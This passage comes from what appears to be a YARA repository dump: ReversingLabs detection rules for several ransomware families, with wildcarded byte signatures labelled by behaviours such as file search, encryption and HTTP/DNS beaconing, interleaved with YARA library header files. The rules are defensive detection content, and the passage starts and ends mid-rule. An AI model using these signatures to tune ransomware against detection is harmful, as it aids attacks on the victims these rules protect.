?? ?? ?? ?? 8B 45 ?? 6A ?? 6A ?? FF 70 ?? FF 70 34 | ?? 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? 57 53 FF 35 | 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 55 ?? 81 FA ?? ?? ?? ?? 72 ?? 66 83 7F ?? 36 | ?? 75 ?? 85 D2 0F B7 C2 B9 ?? ?? ?? ?? 0F 45 C8 66 89 4F ?? 8B 45 ?? FF 70 ?? FF 70 37 | ?? FF 75 ?? FF 75 ?? 57 53 FF 55 ?? 8B 55 ?? 8B 4D ?? 8B 45 ?? 41 05 ?? ?? ?? ?? 89 38 | 4D ?? 89 45 ?? 3B 4E ?? 0F 82 ?? ?? ?? ?? 8B 7D ?? EB ?? FF 15 ?? ?? ?? ?? 33 FF 85 39 | DB 74 ?? 83 FB ?? 74 ?? 53 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 85 F6 74 ?? 56 6A ?? 40 | FF D3 8B 35 ?? ?? ?? ?? 50 FF D6 EB ?? FF 15 ?? ?? ?? ?? 8B 7D ?? EB ?? 33 C0 5F 5E 41 | 5B 8B E5 5D C2 ?? ?? 8B 35 ?? ?? ?? ?? 85 FF 74 ?? 57 6A ?? FF D3 50 FF D6 8B 45 ?? 42 | 5F 5E 5B 8B E5 5D C2 43 | } 44 | 45 | condition: 46 | uint16(0) == 0x5A4D and 47 | ( 48 | $corrupt_physical_drive 49 | ) 50 | } -------------------------------------------------------------------------------- /src/lib/include/yara/sizedstr.h: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright (c) 2007-2014. The YARA Authors. All Rights Reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without modification, 5 | are permitted provided that the following conditions are met: 6 | 7 | 1. Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | 2. Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation and/or 12 | other materials provided with the distribution. 13 | 14 | 3. Neither the name of the copyright holder nor the names of its contributors 15 | may be used to endorse or promote products derived from this software without 16 | specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 22 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 24 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 25 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 27 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 28 | */ 29 | 30 | #ifndef _SIZEDSTR_H 31 | #define _SIZEDSTR_H 32 | 33 | #include 34 | #include 35 | 36 | // SIZED_STRING_FLAGS_NO_CASE indicates that the has been decorated with 37 | // the "nocase" modifier or with the /i modifier in the case of regular 38 | // expressions. 39 | #define SIZED_STRING_FLAGS_NO_CASE 1 40 | 41 | // SIZED_STRING_FLAGS_DOT_ALL is used for strings that contain a regular 42 | // expression that had the /s modifier. 43 | #define SIZED_STRING_FLAGS_DOT_ALL 2 44 | 45 | 46 | #pragma pack(push) 47 | #pragma pack(1) 48 | 49 | // 50 | // This struct is used to support strings containing null chars. The length of 51 | // the string is stored along the string data. However the string data is also 52 | // terminated with a null char. 53 | // 54 | typedef struct _SIZED_STRING 55 | { 56 | uint32_t length; 57 | uint32_t flags; 58 | 59 | char c_string[1]; 60 | 61 | } SIZED_STRING; 62 | 63 | #pragma pack(pop) 64 | 65 | int ss_compare(SIZED_STRING* s1, SIZED_STRING* s2); 66 | 67 | int ss_icompare(SIZED_STRING* s1, SIZED_STRING* s2); 68 | 69 | bool ss_contains(SIZED_STRING* s1, SIZED_STRING* s2); 70 | 71 | bool ss_icontains(SIZED_STRING* s1, SIZED_STRING* s2); 72 | 73 | bool ss_startswith(SIZED_STRING* s1, SIZED_STRING* s2); 74 | 75 | bool ss_istartswith(SIZED_STRING* s1, SIZED_STRING* s2); 76 | 77 | bool ss_endswith(SIZED_STRING* s1, SIZED_STRING* s2); 78 | 79 | bool ss_iendswith(SIZED_STRING* s1, SIZED_STRING* s2); 80 | 81 | SIZED_STRING* ss_dup(SIZED_STRING* s); 82 | 83 | SIZED_STRING* ss_new(const char* s); 84 | 85 | SIZED_STRING* ss_convert_to_wide(SIZED_STRING* s); 86 | 87 | #endif 88 | -------------------------------------------------------------------------------- /src/exp/ransomware/Win32.Ransomware.Crypmic.yara: -------------------------------------------------------------------------------- 1 | rule Win32_Ransomware_Crypmic : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "CRYPMIC" 12 | description = "Yara rule that detects Crypmic ransomware." 13 | 14 | tc_detection_type = "Ransomware" 15 | tc_detection_name = "Crypmic" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | 20 | $search_and_encrypt_1 = { 21 | 55 8B EC 81 EC ?? ?? ?? ?? 53 56 B8 ?? ?? ?? ?? 57 8B F9 89 7D ?? C7 45 ?? ?? ?? ?? 22 | ?? 89 45 ?? 8D 50 ?? 68 ?? ?? ?? ?? 6A ?? FF 77 ?? 66 89 85 ?? ?? ?? ?? 8B 47 ?? C7 23 | 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF D0 66 8B 95 ?? ?? ?? ?? 33 F6 33 24 | C9 89 45 ?? 66 3B F2 74 ?? 0F B7 D2 41 66 89 14 06 8D 34 09 33 DB 0F B7 94 35 ?? ?? 25 | ?? ?? 66 3B DA 75 ?? BA ?? ?? ?? ?? 66 89 14 48 8D 1C 48 8D 8D ?? ?? ?? ?? 51 C7 43 26 | ?? ?? ?? ?? ?? 50 8B 47 ?? FF D0 8B F0 83 FE ?? 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? 27 | ?? 74 ?? 66 8B 8D ?? ?? ?? ?? 66 83 F9 ?? 74 ?? 66 83 BD ?? ?? ?? ?? ?? 74 ?? 33 D2 28 | 33 C0 66 3B D1 74 ?? 0F B7 C9 8B FF 40 66 89 4C 1A ?? 8D 14 00 C7 45 ?? ?? ?? ?? ?? 29 | 0F B7 8C 15 ?? ?? ?? ?? 66 39 4D ?? 75 ?? 8B 55 ?? 33 C9 66 89 4C 43 ?? 68 ?? ?? ?? 30 | ?? 8B CF E8 ?? ?? ?? ?? 83 C4 ?? 01 45 ?? 8D 85 ?? ?? ?? ?? 50 8B 47 ?? 56 FF D0 85 31 | C0 75 ?? 8B 47 ?? 56 FF D0 8D 85 ?? ?? ?? ?? 50 FF 75 ?? C7 43 ?? ?? ?? ?? ?? 8B 47 32 | } 33 | 34 | $search_and_encrypt_2 = { 35 | 33 F6 89 75 ?? FF D0 89 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? EB ?? 8D 9B ?? ?? ?? ?? 36 | F6 85 ?? ?? ?? ?? ?? 75 ?? 66 8B BD ?? ?? ?? ?? 33 F6 8B 8E ?? ?? ?? ?? 8D 95 ?? ?? 37 | ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? BA ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 83 FF ?? 75 ?? 38 | EB ?? 8D 9B ?? ?? ?? ?? 66 8B 48 ?? 83 C0 ?? 83 C2 ?? 66 3B 0A 74 ?? 66 83 38 ?? 0F 39 | 85 ?? ?? ?? ?? 66 83 3A ?? 0F 85 ?? ?? ?? ?? 83 C6 ?? 81 FE ?? ?? ?? ?? 72 ?? 8B 7D 40 | ?? 8B 75 ?? 8B 45 ?? 8D 8D ?? ?? ?? ?? 51 50 8B 47 ?? FF D0 85 C0 8B 45 ?? 0F 85 ?? 41 | ?? ?? ?? 50 8B 47 ?? FF D0 85 F6 74 ?? 8B 55 ?? 33 C0 8B CF 66 89 43 ?? E8 ?? ?? ?? 42 | ?? FF 75 ?? 8B 47 ?? 6A ?? FF 77 ?? FF D0 8B 45 ?? 8B 5D ?? 03 C6 03 D8 8B 45 ?? 40 43 | 89 5D ?? 89 45 ?? BA ?? ?? ?? ?? 83 F8 ?? 0F 8E ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? 44 | ?? ?? ?? 50 8B 47 ?? 68 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B CF E8 45 | ?? ?? ?? ?? 83 C4 ?? 03 C3 5F 5E 5B 8B E5 5D C3 33 C9 33 C0 66 3B CF 74 ?? 0F B7 CF 46 | 33 D2 8D 9B ?? ?? ?? ?? 40 66 89 4C 1A ?? 8D 14 00 33 F6 0F B7 8C 15 ?? ?? ?? ?? 66 47 | 3B F1 75 ?? 8B 75 ?? FF 75 ?? 8B 7D ?? 33 C9 46 57 66 89 4C 43 ?? 89 75 ?? E8 ?? ?? 48 | ?? ?? E9 49 | } 50 | 51 | condition: 52 | uint16(0) == 0x5A4D and 53 | ( 54 | (all of ($search_and_encrypt_*)) 55 | ) 56 | } -------------------------------------------------------------------------------- /src/exp/ransomware/ByteCode.MSIL.Ransomware.TimeCrypt.yara: -------------------------------------------------------------------------------- 1 | rule ByteCode_MSIL_Ransomware_TimeCrypt : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "TIMECRYPT" 12 | description = "Yara rule that detects TimeCrypt ransomware." 13 | 14 | tc_detection_type = "Ransomware" 15 | tc_detection_name = "TimeCrypt" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | 20 | $find_files = { 21 | 7E ?? ?? ?? ?? 0A 16 0B 38 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0C 08 06 07 9A 7D ?? ?? ?? ?? 73 22 | ?? ?? ?? ?? 0D 09 08 7D ?? ?? ?? ?? 09 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 09 23 | 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 28 ?? 24 | ?? ?? ?? 09 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 09 7B ?? ?? 25 | ?? ?? 72 ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 7B ?? ?? ?? ?? 26 | 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? 27 | ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 2B ?? 09 7B ?? ?? ?? ?? 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 28 | ?? ?? ?? ?? 2C ?? 1B 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 2B ?? 1F ?? 28 ?? ?? ?? ?? 73 29 | ?? ?? ?? ?? 13 ?? 11 ?? 2D ?? 2A 11 ?? 6F ?? ?? ?? ?? 09 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? 30 | ?? 28 ?? ?? ?? ?? 26 11 ?? 6F ?? ?? ?? ?? 09 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? 31 | ?? ?? 26 07 17 58 0B 07 06 8E 69 3F ?? ?? ?? ?? 2A 32 | } 33 | 34 | $encrypt_files = { 35 | 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 73 ?? ?? ?? ?? 0A 06 03 6F ?? ?? ?? ?? 06 02 6F 36 | ?? ?? ?? ?? 26 06 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 06 2C ?? 06 6F 37 | ?? ?? ?? ?? DC 02 17 28 ?? ?? ?? ?? DE ?? 26 DE ?? 2A 38 | } 39 | 40 | $send_http_request = { 41 | 1C 8D ?? ?? ?? ?? 25 16 72 ?? ?? ?? ?? A2 25 17 02 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? 42 | ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 25 18 72 ?? ?? ?? ?? A2 25 19 43 | 03 A2 25 1A 72 ?? ?? ?? ?? A2 25 1B 04 28 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 0A 73 ?? ?? ?? 44 | ?? 25 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 6F 45 | ?? ?? ?? ?? 26 DE ?? 26 DE ?? 2A 46 | } 47 | 48 | $send_dns_request = { 49 | 1C 8D ?? ?? ?? ?? 25 16 04 28 ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 03 A2 25 19 50 | 72 ?? ?? ?? ?? A2 25 1A 02 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 51 | 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 25 1B 72 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 52 | 26 DE ?? 26 DE ?? 2A 53 | } 54 | 55 | condition: 56 | uint16(0) == 0x5A4D and 57 | ( 58 | $find_files 59 | ) and 60 | ( 61 | $encrypt_files 62 | ) and 63 | ( 64 | $send_http_request 65 | ) and 66 | ( 67 | $send_dns_request 68 | ) 69 | } -------------------------------------------------------------------------------- /src/exp/ransomware/ByteCode.MSIL.Ransomware.GhosTEncryptor.yara: -------------------------------------------------------------------------------- 1 | rule ByteCode_MSIL_Ransomware_GhosTEncryptor : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "GHOSTENCRYPTOR" 12 | description = "Yara rule that detects GhosTEncryptor ransomware." 13 | 14 | tc_detection_type = "Ransomware" 15 | tc_detection_name = "GhosTEncryptor" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | 20 | $enum_folders = { 21 | 17 8D ?? ?? ?? ?? 0A 06 16 72 ?? ?? ?? ?? A2 03 28 ?? ?? ?? ?? 0B 16 0C 38 ?? ?? ?? ?? 22 | 07 08 9A 0D 02 09 28 ?? ?? ?? ?? 2C ?? 09 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 09 72 ?? 23 | ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 09 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 09 72 ?? ?? ?? ?? 24 | 6F ?? ?? ?? ?? 2D ?? 09 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 09 72 ?? ?? ?? ?? 6F ?? ?? 25 | ?? ?? 2D ?? 09 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 02 02 7B ?? ?? ?? ?? 09 72 ?? ?? ?? 26 | ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 09 28 ?? ?? ?? ?? 26 08 17 58 0C 08 07 8E 69 3F ?? 27 | ?? ?? ?? 02 7B ?? ?? ?? ?? 06 17 6F ?? ?? ?? ?? 2A 28 | } 29 | 30 | $encrypt_folder_p1 = { 31 | 1F ?? 8D ?? ?? ?? ?? 25 16 72 ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 72 ?? ?? ?? 32 | ?? A2 25 19 72 ?? ?? ?? ?? A2 25 1A 72 ?? ?? ?? ?? A2 25 1B 72 ?? ?? ?? ?? A2 25 1C 72 33 | ?? ?? ?? ?? A2 25 1D 72 ?? ?? ?? ?? A2 25 1E 72 ?? ?? ?? ?? A2 25 1F ?? 72 ?? ?? ?? ?? 34 | A2 25 1F ?? 72 ?? ?? ?? ?? A2 25 1F ?? 72 35 | } 36 | 37 | $encrypt_folder_p2 = { 38 | A2 0A 03 28 ?? ?? ?? ?? 0B 03 28 ?? ?? ?? ?? 0C 16 0D 2B ?? 07 09 9A 28 ?? ?? ?? ?? 13 39 | ?? 06 11 ?? 28 ?? ?? ?? ?? 2C ?? 02 07 09 9A 04 28 ?? ?? ?? ?? 09 17 58 0D 09 07 8E 69 40 | 32 ?? 16 13 ?? 2B ?? 02 08 11 ?? 9A 04 28 ?? ?? ?? ?? 11 ?? 17 58 13 ?? 11 ?? 08 8E 69 41 | 32 ?? 2A 42 | } 43 | 44 | $deep_search_p1 = { 45 | 17 8D ?? ?? ?? ?? 0A 06 16 72 ?? ?? ?? ?? A2 7E ?? ?? ?? ?? 0B 02 0C 16 0D 38 ?? ?? ?? 46 | ?? 08 09 9A 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 13 ?? 11 ?? 72 47 | ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? 48 | ?? ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 11 ?? 72 49 | } 50 | 51 | $deep_search_p2 = { 52 | 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F 53 | ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 07 11 ?? 72 ?? ?? ?? ?? 28 54 | ?? ?? ?? ?? 0B 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 3F ?? ?? ?? ?? 09 17 58 0D 09 08 8E 55 | 69 3F ?? ?? ?? ?? 07 06 17 6F ?? ?? ?? ?? 2A 56 | } 57 | 58 | condition: 59 | uint16(0) == 0x5A4D and 60 | ( 61 | $enum_folders 62 | ) and 63 | ( 64 | all of ($deep_search_p*) 65 | ) and 66 | ( 67 | all of ($encrypt_folder_p*) 68 | ) 69 | } -------------------------------------------------------------------------------- /src/lib/include/yara/endian.h: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright (c) 2016. The YARA Authors. All Rights Reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without modification, 5 | are permitted provided that the following conditions are met: 6 | 7 | 1. Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | 2. Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation and/or 12 | other materials provided with the distribution. 13 | 14 | 3. Neither the name of the copyright holder nor the names of its contributors 15 | may be used to endorse or promote products derived from this software without 16 | specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 22 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 24 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 25 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 27 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 28 | */ 29 | 30 | #ifndef YR_ENDIAN_H 31 | #define YR_ENDIAN_H 32 | 33 | #include 34 | 35 | #if defined(__has_builtin) 36 | #if __has_builtin(__builtin_bswap16) 37 | #define yr_bswap16(x) __builtin_bswap16(x) 38 | #endif 39 | #endif 40 | 41 | #if !defined(yr_bswap16) && defined(_MSC_VER) 42 | #define yr_bswap16(x) _byteswap_ushort(x) 43 | #endif 44 | 45 | #if !defined(yr_bswap16) 46 | uint16_t _yr_bswap16(uint16_t x); 47 | #define yr_bswap16(x) _yr_bswap16(x) 48 | #endif 49 | 50 | #if defined(__has_builtin) 51 | #if __has_builtin(__builtin_bswap32) 52 | #define yr_bswap32(x) __builtin_bswap32(x) 53 | #endif 54 | #endif 55 | 56 | #if !defined(yr_bswap32) && defined(_MSC_VER) 57 | #define yr_bswap32(x) _byteswap_ulong(x) 58 | #endif 59 | 60 | #if !defined(yr_bswap32) 61 | uint32_t _yr_bswap32(uint32_t x); 62 | #define yr_bswap32(x) _yr_bswap32(x) 63 | #endif 64 | 65 | #if defined(__has_builtin) 66 | #if __has_builtin(__builtin_bswap64) 67 | #define yr_bswap64(x) __builtin_bswap64(x) 68 | #endif 69 | #endif 70 | 71 | #if !defined(yr_bswap64) && defined(_MSC_VER) 72 | #define yr_bswap64(x) _byteswap_uint64(x) 73 | #endif 74 | 75 | #if !defined(yr_bswap64) 76 | uint64_t _yr_bswap64(uint64_t x); 77 | #define yr_bswap64(x) _yr_bswap64(x) 78 | #endif 79 | 80 | #if defined(WORDS_BIGENDIAN) 81 | #define yr_le16toh(x) yr_bswap16(x) 82 | #define yr_le32toh(x) yr_bswap32(x) 83 | #define yr_le64toh(x) yr_bswap64(x) 84 | #define yr_be16toh(x) (x) 85 | #define yr_be32toh(x) (x) 86 | #define yr_be64toh(x) (x) 87 | #else 88 | #define yr_le16toh(x) (x) 89 | #define yr_le32toh(x) (x) 90 | #define yr_le64toh(x) (x) 91 | #define yr_be16toh(x) yr_bswap16(x) 92 | #define yr_be32toh(x) yr_bswap32(x) 93 | #define yr_be64toh(x) yr_bswap64(x) 94 | #endif 95 | 96 | #endif 97 | -------------------------------------------------------------------------------- /src/exp/ransomware/Bytecode.MSIL.Ransomware.CobraLocker.yara: -------------------------------------------------------------------------------- 1 | rule Bytecode_MSIL_Ransomware_CobraLocker : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "COBRALOCKER" 12 | description = "Yara rule that detects CobraLocker ransomware." 13 | 14 | tc_detection_type = "Ransomware" 15 | tc_detection_name = "CobraLocker" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | 20 | $encrypt_files = { 21 | 14 0A 1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0C 00 73 ?? 22 | ?? ?? ?? 0D 00 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 23 | 03 07 20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? 24 | ?? 6F ?? ?? ?? ?? 00 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 25 | 09 17 6F ?? ?? ?? ?? 00 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 00 11 ?? 02 16 02 26 | 8E 69 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 00 00 DD ?? ?? ?? ?? 11 ?? 38 ?? ?? ?? ?? 27 | 38 ?? ?? ?? ?? 39 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 00 DC 08 6F ?? ?? ?? ?? 0A 00 DD ?? 28 | ?? ?? ?? 09 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 39 ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 00 DC 00 DD 29 | ?? ?? ?? ?? 08 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 39 ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 00 DC 06 30 | 13 ?? 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 11 ?? 2A 31 | } 32 | 33 | $find_files = { 34 | 16 28 ?? ?? ?? ?? 0A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 35 | 0C 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0D 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 06 72 ?? 36 | ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 13 ?? 08 72 ?? ?? ?? ?? 28 ?? 37 | ?? ?? ?? 72 ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 13 ?? 09 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? 38 | ?? ?? ?? 16 28 ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 39 | 28 ?? ?? ?? ?? 13 ?? 73 ?? ?? ?? ?? 13 ?? 72 ?? ?? ?? ?? 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 40 | 00 11 ?? 11 ?? 11 ?? 9A 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 41 | FE 04 13 ?? 11 ?? 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 00 11 ?? 11 ?? 11 ?? 9A 11 ?? 6F ?? ?? 42 | ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 FE 04 13 ?? 11 ?? 38 ?? ?? ?? ?? 38 ?? 43 | ?? ?? ?? 00 11 ?? 11 ?? 11 ?? 9A 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 44 | ?? 8E 69 FE 04 13 ?? 11 ?? 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 00 11 ?? 11 ?? 11 ?? 9A 11 ?? 45 | 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 FE 04 13 ?? 11 ?? 38 ?? ?? ?? 46 | ?? 38 ?? ?? ?? ?? 3A ?? ?? ?? ?? 16 13 ?? 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 3A ?? ?? ?? ?? 47 | 16 13 ?? 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 3A ?? ?? ?? ?? 16 13 ?? 38 ?? ?? ?? ?? 38 ?? ?? 48 | ?? ?? 3A ?? ?? ?? ?? 2A 49 | } 50 | 51 | condition: 52 | uint16(0) == 0x5A4D and 53 | ( 54 | $find_files 55 | ) and 56 | ( 57 | $encrypt_files 58 | ) 59 | } -------------------------------------------------------------------------------- /src/exp/ransomware/ByteCode.MSIL.Ransomware.Povlsomware.yara: -------------------------------------------------------------------------------- 1 | rule ByteCode_MSIL_Ransomware_Povlsomware : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "POVLSOMWARE" 12 | description = "Yara rule that detects Povlsomware ransomware." 13 | 14 | tc_detection_type = "Ransomware" 15 | tc_detection_name = "Povlsomware" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | 20 | $setup_attack = { 21 | 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? 22 | ?? ?? 73 ?? ?? ?? ?? 0A 06 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 2C ?? 23 | 00 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 8E 69 80 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 24 | 0C 16 0D 2B ?? 08 09 9A 13 ?? 00 7E ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 00 00 09 17 58 0D 25 | 09 08 8E 69 32 ?? 00 38 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 26 | ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 1A 6F ?? ?? ?? 27 | ?? 00 11 